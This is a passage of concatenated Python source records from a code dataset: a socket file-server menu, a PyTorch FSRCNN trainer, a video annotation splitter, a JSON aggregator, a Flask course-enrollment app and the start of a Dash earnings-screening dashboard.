= 0\n\t\twhile(option < 5):\n\t\t\tprint(\"\\nBienvenido al sistema de gestion del servidor... Que opcion desea ejecutar\")\n\t\t\tprint(\"1: LIBROS_DESCARGADOS\")\n\t\t\tprint(\"2: CLIENTES_QUE_CONSULTARON\")\n\t\t\tprint(\"3: NUM_DESCARGASxLIBROxCLIENTE\")\n\t\t\tprint(\"4: DESCARGAS_EN_CURSO\")\n\t\t\tprint(\"5: Salir...\")\n\t\t\toption = raw_input(\"Opcion: \")\n\t\t\tif option.isdigit():\n\t\t\t\toption = int(option)\n\t\t\t\t#Opcion para el listado de descargas completas\n\t\t\t\tif option == 1:\n\t\t\t\t\tlistCompleted()\n\t\t\t\t#Opcion para los clientes que me han consultado\n\t\t\t\telif option == 2:\n\t\t\t\t\tgetClients()\n\t\t\t\telif option == 3:\n\t\t\t\t\tlistBookClient()\n\t\t\t\t#Opcion para listar las descargas en curso\n\t\t\t\telif option == 4:\n\t\t\t\t\tlistDownloads()\n\t\t\t\t#Opcion para finalizar la corrida\n\t\t\t\telif option == 5:\n\t\t\t\t\t#Cerramos el socket del server\n\t\t\t\t\tserver_socket.close()\n\t\t\t\t\t#Matamos el proceso listener para dejar libre el puerto\n\t\t\t\t\tfile = open(\"./listen_process.txt\",\"r\")\n\t\t\t\t\tp_id = int(file.read())\n\t\t\t\t\tos.kill(p_id,signal.SIGKILL)\n\t\t\t\t\tos.remove(\"./listen_process.txt\")\n\t\t\t\t\t#Borramos el contenido de la carpera Server_info\n\t\t\t\t\tinfo = os.listdir(\"./Server_info\")\n\t\t\t\t\tfor file in info:\n\t\t\t\t\t\tos.remove(\"./Server_info/%s\"%(file))\n\t\t\t\t\tos.rmdir(\"./Server_info\")\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Ha ingresado una opcion invalida...\")\n\t\t\t\t\toption = 0\n\t\t\telse:\n\t\t\t\tprint(\"Ha ingresado una opcion invalida...\")\n\t\t\t\toption = 0\n\n\n\nif __name__ == '__main__':\n\tmain()", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 7875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 36, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 37, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 38, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 67, "usage_type": "call"}, {"api_name": "socket.recv", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "socket.send", "line_number": 87, "usage_type": "call"}, {"api_name": "socket.send", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 101, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 126, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 128, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 128, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 128, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 130, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 135, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 139, "usage_type": "call"}, {"api_name": 
"os.mkdir", "line_number": 145, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 147, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 149, "usage_type": "call"}, {"api_name": "os.fork", "line_number": 151, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 168, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.fork", "line_number": 172, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 175, "usage_type": "call"}, {"api_name": "os.kill", "line_number": 215, "usage_type": "call"}, {"api_name": "signal.SIGKILL", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 216, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 218, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 220, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "473138363", "text": "import torch\nimport torch.backends.cudnn as cudnn\n\nfrom models.FSRCNN.model import Net\nfrom trainer import Trainer\n\n\nclass FSRCNNTrainer(Trainer):\n def __init__(self, config, training_loader, valid_loader):\n super(FSRCNNTrainer, self).__init__(config, training_loader, valid_loader, \"fsrcnn\")\n\n def build_model(self):\n self.model = Net(num_channels=3, upscale_factor=self.upscale_factor).to(self.device)\n self.model.weight_init(mean=0.0, std=0.2)\n self.criterion = torch.nn.MSELoss()\n torch.manual_seed(self.seed)\n\n if self.GPU_IN_USE:\n torch.cuda.manual_seed(self.seed)\n cudnn.benchmark = True\n self.criterion.cuda()\n\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[50, 75, 100], gamma=0.5) # lr decay\n", "sub_path": "models/FSRCNN/fsrcnn_trainer.py", "file_name": "fsrcnn_trainer.py", "file_ext": "py", "file_size_in_byte": 906, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "trainer.Trainer", "line_number": 8, "usage_type": "name"}, {"api_name": "models.FSRCNN.model.Net", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 24, "usage_type": "attribute"}]}
+{"seq_id": "230193758", "text": "import json\nimport random\nfrom argparse import ArgumentParser\nfrom collections import defaultdict\nfrom os import makedirs, listdir\nfrom os.path import exists, join, isfile, basename\n\n\ndef ensure_dir_exists(dir_path):\n if not exists(dir_path):\n makedirs(dir_path)\n\n\ndef get_valid_sources(all_sources):\n return [s for s in all_sources if exists(s)]\n\n\ndef print_data_sources_stat(data_sources):\n print('Specified {} valid data sources:'.format(len(data_sources)))\n for data_source in data_sources:\n print(' - {}'.format(data_source))\n\n\ndef parse_records(data_sources):\n num_records = defaultdict(int)\n out_records = dict()\n for data_source in data_sources:\n data_type = basename(data_source).split('.')[0]\n\n with open(data_source) as input_stream:\n for line_id, line in enumerate(input_stream):\n if line_id == 0:\n continue\n\n line_elements = line.strip().split(',')\n if len(line_elements) != 4:\n continue\n\n label, video_name, start, end = line_elements\n\n segment_id = num_records[video_name]\n segment_name = f'{video_name}_segment{segment_id}'\n\n num_records[video_name] += 1\n out_records[segment_name] = dict(\n label=int(label),\n data_type=data_type\n )\n\n return out_records\n\n\ndef validate_videos(records, videos_dir, extension):\n downloaded_videos = set(\n f.replace(f'.{extension}', '')\n for f in listdir(videos_dir)\n if isfile(join(videos_dir, f)) and f.endswith(extension)\n )\n all_videos = set(video_name for video_name in records.keys())\n\n valid_videos = downloaded_videos & all_videos\n out_records = {video_name: records[video_name] for video_name in valid_videos}\n\n return out_records\n\n\ndef split_train_val_subsets(records, test_ratio=0.1):\n assert 0.0 < test_ratio < 1.0\n\n by_labels = defaultdict(list)\n for video_name, content in records.items():\n by_labels[content['label']].append(video_name)\n\n clustered_segments = dict()\n for label, segments in by_labels.items():\n videos = defaultdict(list)\n for segment in segments:\n video, _ = segment.split('_segment')\n videos[video].append(segment)\n\n clustered_segments[label] = videos\n\n out_records = dict()\n for label, videos in clustered_segments.items():\n num_records = len(by_labels[label])\n assert num_records > 1\n\n video_names = list(videos.keys())\n num_videos = len(video_names)\n assert num_videos > 1\n\n num_test_samples = min(num_records - 1, max(1, int(num_records * test_ratio)))\n num_test_videos = min(num_videos - 1, max(1, int(num_videos * test_ratio)))\n\n num_selected_test_samples = 0\n test_videos = []\n for test_video_name in random.sample(video_names, num_test_videos):\n test_videos.append(test_video_name)\n segments = videos[test_video_name]\n\n for segment in segments:\n out_records[segment] = dict(label=label, data_type='val')\n\n num_selected_test_samples += len(segments)\n if num_selected_test_samples >= num_test_samples:\n break\n\n train_videos = list(set(video_names) - set(test_videos))\n for train_video_name in train_videos:\n segments = videos[train_video_name]\n\n for segment in segments:\n out_records[segment] = dict(label=label, data_type='train')\n\n return out_records\n\n\ndef build_classmap(records):\n labels = set(record['label'] for record in records.values())\n return {class_name: i for i, class_name in enumerate(sorted(labels))}\n\n\ndef convert_annot(records, classmap, extension):\n out_records = dict()\n for video_name, content in records.items():\n label_id = classmap[content['label']]\n 
out_records[f'{video_name}.{extension}'] = label_id, content['data_type']\n\n return out_records\n\n\ndef group_by_type(annotation):\n out_data = defaultdict(list)\n for video_name, (label_id, data_type) in annotation.items():\n out_data[data_type].append((video_name, label_id))\n\n return out_data\n\n\ndef write_classmap(classmap, out_path):\n with open(out_path, 'w') as output_stream:\n json.dump(classmap, output_stream)\n\n\ndef write_annot(records, out_path):\n with open(out_path, 'w') as output_stream:\n for video_name, label_id in records:\n output_stream.write(f'{video_name} {label_id}\\n')\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--sources', '-s', nargs='+', type=str, required=True)\n parser.add_argument('--videos_dir', '-v', type=str, required=True)\n parser.add_argument('--output_dir', '-o', type=str, required=True)\n parser.add_argument('--extension', '-e', type=str, required=False, default='avi')\n parser.add_argument('--test_ratio', '-r', type=float, required=False, default=0.1)\n args = parser.parse_args()\n\n ensure_dir_exists(args.output_dir)\n\n data_sources = get_valid_sources(args.sources)\n print_data_sources_stat(data_sources)\n assert len(data_sources) > 0\n\n records = parse_records(data_sources)\n print(f'Found {len(records)} records.')\n\n classmap = build_classmap(records)\n print(f'Found {len(classmap)} unique classes.')\n\n out_classmap_path = join(args.output_dir, 'classmap.json')\n write_classmap(classmap, out_classmap_path)\n print(f'Dumped classmap to: {out_classmap_path}')\n\n records = validate_videos(records, args.videos_dir, args.extension)\n print(f'Validated {len(records)} videos.')\n\n records = split_train_val_subsets(records, args.test_ratio)\n\n annot = convert_annot(records, classmap, args.extension)\n split_annot = group_by_type(annot)\n\n for data_type, records in split_annot.items():\n out_annot_path = join(args.output_dir, f'{data_type}.txt')\n write_annot(records, out_annot_path)\n print(f'Dumped annot to: {out_annot_path}')\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tools/data/youtube-8m/prepare_annot.py", "file_name": "prepare_annot.py", "file_ext": "py", "file_size_in_byte": 6137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 28, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 70, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 76, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 97, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 133, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 142, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}]}
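The core idea in split_train_val_subsets above is to split at the video level, so segments of one video never land in both subsets. A compact, self-contained illustration of that grouping step (toy segment names; the 0.3 ratio and the seed are arbitrary, chosen only for a reproducible demo):

import random
from collections import defaultdict

random.seed(0)  # only for a reproducible demo
segments = ["vidA_segment0", "vidA_segment1", "vidB_segment0", "vidC_segment0"]

by_video = defaultdict(list)
for seg in segments:
    video, _ = seg.split("_segment")  # same naming scheme as parse_records
    by_video[video].append(seg)

videos = list(by_video)
val_videos = set(random.sample(videos, max(1, int(len(videos) * 0.3))))

split = {seg: ("val" if vid in val_videos else "train")
         for vid, segs in by_video.items() for seg in segs}
print(split)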
+{"seq_id": "558869849", "text": "import json\n\njson_file=open('week1.json')\ndata=json.load(json_file)\nprint(type(data))\nview={'Monday':{},'Tuesday':{},'Wednesday':{},'Thursday':{},'Friday':{}}\n\nfor p in data:\n temp=0\n for k,v in p[2]['conference-categories-count'].items():\n temp=temp+v\n if p[0]['dow']=='Monday':\n view['Monday'][p[1]['time']]=temp\n elif p[0]['dow']=='Tuesday':\n view['Tuesday'][p[1]['time']] = temp\n elif p[0]['dow']=='Wednesday':\n view['Wednesday'][p[1]['time']] = temp\n elif p[0]['dow']=='Thursday':\n view['Thursday'][p[1]['time']] = temp\n elif p[0]['dow']=='Friday':\n view['Friday'][p[1]['time']] = temp\n\nfor k,v in view.items():\n print(\"{}===>{}\".format(k,v))\n\n\n\n", "sub_path": "ReadJSON.py", "file_name": "ReadJSON.py", "file_ext": "py", "file_size_in_byte": 717, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "516869642", "text": "from flask import Flask, request, render_template, redirect, url_for, flash\nimport dao.connect\nimport threading\nimport csv\nimport re\nimport beans.fach\nimport dao.application_dao\nfrom beans import fach\n\n\napp = Flask(__name__, template_folder='template')\napp.secret_key = b'hdgsJ%82/\"*dbh#'\n\n\ndef csv_reader(path):\n with open(path, \"r\") as csvfile:\n tmp = {}\n reader = csv.reader(csvfile, delimiter='=')\n for line in reader:\n tmp[line[0]] = line[1]\n return tmp\n\nconfig = csv_reader(\"properties.settings\")\n\n\n@app.route(\"//\", methods=['GET', 'POST'])\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index(bid):\n \"\"\"Erste Seite der Webseite: \"\"\"\n user_store = dao.application_dao.ApplicationDao() \n\n meine_kurse = user_store.get_my_courses(bid)\n verf_kurse = user_store.get_all_other_courses(bid)\n\n #result = False\n #if request.method == \"POST\":\n # Form data\n #name = request.form['course_name'] \n #enroll_key = request.form.get('schluessel')\n #free_spots = request.form.get('freie_plaetze') \n #desc = request.form.get('btext')\n \n #print(name, bid, enroll_key, free_spots, desc)\n \n #new_course = fach.Kurs(name, bid, free_spots, desc, enroll_key)\n \n #course_store = dao.application_dao.ApplicationDao()\n\n #course_id = course_store.add_course(new_course) # Muss eine valide kid zurückliefern\n #print(course_id, bid)\n #course_store.completion()\n #course_store.close()\n\n #if course_id is not None: #Wenn course_id nicht NULL ist, ist es valid #TODO\n #with threading.Lock():\n #user_store.einschreiben(bid, course_id, enroll_key) #Add owner to course, Fix\n \n #user_store.completion()\n #user_store.close()\n\n # TODO res=result\n return render_template('index.html', mkurse=meine_kurse, vkurse=verf_kurse, bid=bid)\n\n\n@app.route(\"//new_course\", methods=['POST', 'GET'])\ndef new_course(bid):\n return render_template(\"new_course.html\", bid=bid)\n\n\n@app.route(\"//view_course\", methods=['POST', 'GET'])\ndef view_course(bid):\n info_store = dao.application_dao.ApplicationDao()\n kname = str(request.form.get(\"kname\"))\n ersteller = str(request.form.get(\"ersteller\"))\n fp = request.form.get(\"fp\")\n\n #print(bid)\n\n #Einschreibeschlüssel, wenn vorhanden. Wird benutzt zu prüfen, ob ein Schlüssel stimmt\n reg_key = info_store.get_key(kname, ersteller) \n\n #course owner\n owner = info_store.get_course_owner(kname) \n #print(owner)\n\n desc = info_store.get_course_details(kname, ersteller)\n\n # Read details for above data from database \n\n #course id\n kid = info_store.get_kid(kname, ersteller)\n\n #print(ersteller)\n #print(kid)\n #print(bid)\n\n #check resgistrstion status. 
Returns True or False\n registered = info_store.is_registered(bid, kid)\n\n #print(bid, kid)\n #print(registered)\n\n exercises = None\n\n #Get exercises for kid retieved\n exercises = info_store.get_ex_list(kid, int(bid))\n\n # TODO: Different view for ersteller\n\n\n return render_template(\"view_course.html\", bid=bid, kname=kname, desc=desc, fp=fp, \n ersteller=ersteller, schluessel=reg_key, owner=owner, exercises=exercises, \n registered=registered, kid=kid)\n\n\n@app.route('//new_enroll', methods=['POST', 'GET'])\ndef new_enroll(bid):\n kname = request.form.get(\"kname\")\n ersteller = request.form.get(\"ersteller\")\n\n\n return render_template('new_enroll.html', bid=bid, kname=kname, ersteller=ersteller)\n\n\n@app.route('//new_assignment', methods=['POST', 'GET'])\ndef new_assignment(bid):\n\n store_submission = dao.application_dao.ApplicationDao()\n \n kid = request.form.get('kid')\n\n anummer = request.form.get('anummer')\n\n kname = request.form.get('kname')\n\n ex_name = request.form.get('ex_name')\n\n\n #TODO: decription\n #desc = store_submission.get_ex_details(kid, anummer)\n\n\n #print(bid, kid, anummer)\n\n #Submissions should be done only once: TODO: Is defective\n #is_duplicate = store_submission.submission_exists(bid, kid, anummer)\n\n #print(is_duplicate) TODO\n\n return render_template('new_assignment.html', kname=kname, ex_name=ex_name)\n\n\n@app.route('/onlineLearner', methods=['GET'])\ndef onlineLearn():\n\n try:\n dbExists = dao.connect.DBUtil().checkDatabaseExistsExternal()\n if dbExists:\n db2exists = 'vorhanden! Supi!'\n else:\n db2exists = 'nicht vorhanden :-('\n except Exception as e:\n print(e)\n\n return render_template('onlineLearner.html', db2exists=db2exists, db2name=\"onlineLearner\")\n\n\n\n\n\nif __name__ == \"__main__\":\n port = int(\"9\" + re.match(r\"([a-z]+)([0-9]+)\", config[\"username\"], re.I).groups()[1])\n app.run(host='0.0.0.0', port=port, debug=True)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 18, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 30, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 72, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 72, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", 
"line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 122, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 128, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 128, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 128, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 136, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 150, "usage_type": "call"}, {"api_name": "dao.connect.connect.DBUtil", "line_number": 157, "usage_type": "call"}, {"api_name": "dao.connect.connect", "line_number": 157, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 165, "usage_type": "call"}, {"api_name": "re.match", "line_number": 172, "usage_type": "call"}, {"api_name": "re.I", "line_number": 172, "usage_type": "attribute"}]}
+{"seq_id": "269776011", "text": "# Import required libraries\nimport os\nimport datetime as dt\n\nimport numpy as np\nimport pandas as pd\nimport plotly.plotly as py\nimport flask\nimport dash\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nimport dash_table_experiments as dasht\n\nfrom py_vollib.black_scholes_merton.implied_volatility import *\nfrom py_vollib.black_scholes_merton.greeks.analytical import *\nfrom data_collect import *\n\n\n# Setup app\n# server = flask.Flask(__name__)\n# server.secret_key = os.environ.get('secret_key', 'secret')\n# app = dash.Dash(__name__, server=server, url_base_pathname='/dash/gallery/volatility-surface', csrf_protect=False)\napp = dash.Dash(__name__)\n#server = app.server\n\nexternal_css = [\"https://fonts.googleapis.com/css?family=Overpass:300,300i\",\n \"https://cdn.rawgit.com/plotly/dash-app-stylesheets/dab6f937fd5548cebf4c6dc7e93a10ac438f5efb/dash-technical-charting.css\"]\n\nfor css in external_css:\n app.css.append_css({\"external_url\": css})\n\nif 'DYNO' in os.environ:\n app.scripts.append_script({\n 'external_url': 'https://cdn.rawgit.com/chriddyp/ca0d8f02a1659981a0ea7f013a378bbd/raw/e79f3f789517deec58f41251f7dbb6bee72c44ab/plotly_ga.js'\n })\n \n\ndef generate_table(dataframe):\n return html.Table(\n # Header\n [html.Tr([html.Th(col) for col in dataframe.columns])] +\n\n # Body\n [html.Tr([\n html.Td(dataframe.iloc[i][col]) for col in dataframe.columns\n ]) for i in range(len(dataframe))]\n )\n\n# Make app layout\napp.layout = html.Div(\n [\n html.Div([\n html.Img(\n src=\"http://fchen.info/wp-content/uploads/2016/10/fclogo2.png\",\n className='two columns',\n style={\n 'height': '60',\n 'width': '60',\n 'float': 'left',\n 'position': 'relative',\n },\n ),\n html.H1(\n 'Earnings Screening',\n className='eight columns',\n style={'text-align': 'center'}\n ),\n html.Img(\n src=\"https://s3-us-west-1.amazonaws.com/plotly-tutorials/logo/new-branding/dash-logo-by-plotly-stripe.png\",\n className='two columns',\n style={\n 'height': '60',\n 'width': '135',\n 'float': 'right',\n 'position': 'relative',\n },\n ),\n ],\n className='row'\n ),\n html.Hr(style={'margin': '0', 'margin-bottom': '5'}),\n \n ################# Input for Earnings DF Layout ########################\n html.Div([\n html.H4(\n 'Upcoming Earnings',\n className='twelve columns',\n style={'text-align': 'center'}\n ),\n ],\n className='row',\n style={'margin-bottom': '20'}\n ), \n \n html.Div([\n html.Div([\n html.Label('Starting Date:',\n style={'text-align': 'center'}),\n dcc.DatePickerSingle(\n id='startdate',\n date=dt.date.today(),\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='three columns',\n ),\n html.Div([\n html.Label('Days Forward:',\n style={'text-align': 'left'}),\n dcc.Slider(\n id='forward_days',\n marks={i: '{}'.format(i) for i in range(11)},\n min=0,\n max=10,\n step=1,\n value=0\n )\n ],\n className='six columns',\n style={'margin-bottom': '20'}\n ),\n html.Div([\n html.Label('Earnings Query:'),\n html.Button('Submit Earnings Query', id='earnings_query'),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='three columns',\n )\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n\t\t\n\t\thtml.Div([\n html.Div([\n html.Label('Max Strike Gap:'),\n dcc.Input(\n id='max_gap',\n type='number',\n value=5\n )\n ], \n 
style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n html.Div([\n html.Label('DTE Threshold:'),\n dcc.Input(\n id='dte_thresh',\n type='number',\n value=5\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n html.Div([\n html.Label('Strike Filter Type:'),\n dcc.Input(\n id='strike_filter',\n type='text',\n value='bounds'\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n \n html.Div([\n html.Label('Moneyness Threshold:'),\n dcc.Input(\n id='money_thresh',\n type='number',\n value=0.1\n )\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n\t\t\thtml.Div([\n html.Label('Strike Adjustment:'),\n dcc.Input(\n id='bounds_adj',\n type='number',\n value=0,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n \n ################# Earnings DF Layout ########################\n html.Div([\n html.Button('Update Earnings Table', id='earnings_show'),\n dasht.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n id='e_table'\n ),\n html.Div(id='selected-indexes')\n ],\n className='row',\n style={'margin-bottom': '20',\n 'text-align': 'center'}\n ),\n \n ################# Input for Condors DF Layout ########################\n html.Div([\n html.H4(\n 'Potential Condors',\n className='twelve columns',\n style={'text-align': 'center'}\n ),\n ],\n className='row',\n style={'margin-bottom': '20'}\n ), \n \n \n html.Div([\n html.Div([\n html.Label('Delta Threshold:'),\n dcc.Input(\n id='delta_thresh',\n type='number',\n value=0.03\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n ),\n html.Div([\n html.Label('Minimum Premium:'),\n dcc.Input(\n id='minimum_prem',\n type='number',\n value=0.15,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n ),\n html.Div([\n html.Label('Risk Reward Threshold:'),\n dcc.Input(\n id='rr_thresh',\n type='number',\n value=0.2,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n )\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n \n ################# Condors DF Layout ########################\n \n html.Div([\n html.Button('Update Condors Table', id='condors_show'),\n dasht.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n id='c_table'\n ),\n html.Div(id='selected-indexes')\n ],\n className='row',\n style={'margin-bottom': '20',\n 'text-align': 'center'}\n ), \n \n # Temporary hack for live dataframe caching\n # 'hidden' set to 'loaded' triggers next callback\n html.P(\n hidden='',\n id='raw_container',\n style={'display': 'none'}\n )\n ],\n style={\n 'width': '85%',\n 'max-width': '1200',\n 'margin-left': 'auto',\n 'margin-right': 'auto',\n 'font-family': 'overpass',\n 'background-color': '#FFFFFF',\n 'padding': '40',\n 'padding-top': '20',\n 'padding-bottom': '20',\n },\n)\n\n# Cache raw data\n@app.callback(\n 
